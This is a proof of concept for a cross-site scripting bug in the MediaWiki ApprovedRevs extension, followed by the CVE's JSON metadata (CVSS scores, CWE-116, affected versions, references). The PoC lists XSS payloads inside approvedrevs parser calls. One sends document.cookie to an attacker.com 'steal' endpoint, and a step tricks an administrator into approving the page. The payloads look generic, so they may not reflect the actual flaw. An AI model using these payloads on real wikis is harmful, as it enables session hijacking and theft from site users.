CVE-2026-22712

<!-- CVE-2026-22712 PoC for MediaWiki ApprovedRevs Extension --> <!-- 利用magic word替换机制的输出编码漏洞 --> <!-- 步骤1: 创建包含恶意payload的页面 --> <!-- 在页面内容中注入XSS payload --> {{#approvedrevs:some_page|<script>alert('XSS-CVE-2026-22712')</script>}} <!-- 或使用其他编码的payload --> {{#approvedrevs:page_name|<img src=x onerror=alert(document.cookie)>}} <!-- 步骤2: 诱导管理员批准该版本 --> <!-- 使用特殊的magic word语法触发漏洞 --> {{#approvedrevs:target_page|javascript:alert('CVE-2026-22712')}} <!-- 步骤3: 当其他用户查看批准版本时触发XSS --> <!-- 反射型XSS payload示例 --> {{#approvedrevs:vulnerable_page|<svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)>}}

{"cve": {"id": "CVE-2026-22712", "sourceIdentifier": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "published": "2026-01-09T00:15:45.837", "lastModified": "2026-02-12T17:50:28.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Encoding or Escaping of Output due to magic word replacement in ParserAfterTidy vulnerability in The Wikimedia Foundation Mediawiki - ApprovedRevs Extension allows Input Data Manipulation.This issue affects Mediawiki - ApprovedRevs Extension: 1.45, 1.44, 1.43, 1.39."}, {"lang": "es", "value": "Codificación o escape incorrectos de la salida debido al reemplazo de palabra mágica en la vulnerabilidad ParserAfterTidy en la Extensión ApprovedRevs de Mediawiki de la Fundación Wikimedia permite la manipulación de datos de entrada. Este problema afecta a la Extensión ApprovedRevs de Mediawiki: 1.45, 1.44, 1.43, 1.39."}], "metrics": {"cvssMetricV40": [{"source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wikiworks:approved_revs:1.39:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "0680AAB5-C5C7-42A3-9CB3-D99E0126955B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikiworks:approved_revs:1.43:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "293B8B8B-6988-4E0A-AC72-B49D7C98C050"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikiworks:approved_revs:1.44:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "30B9A0EC-4B7F-4B53-B073-B18291ECB4F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikiworks:approved_revs:1.45:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "73ADBE38-7AFF-4A77-8294-5786ABC4C852"}]}]}], "references": [{"url": "https://gerrit.wikimedia.org/r/q/Iee1bf1cbc8a519899e7f9dde508856bd4e5a5d2a", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Patch"]}, {"url": "https://phabricator.wikimedia.org/T412068", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://phabricator.wikimedia.org/T412068", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}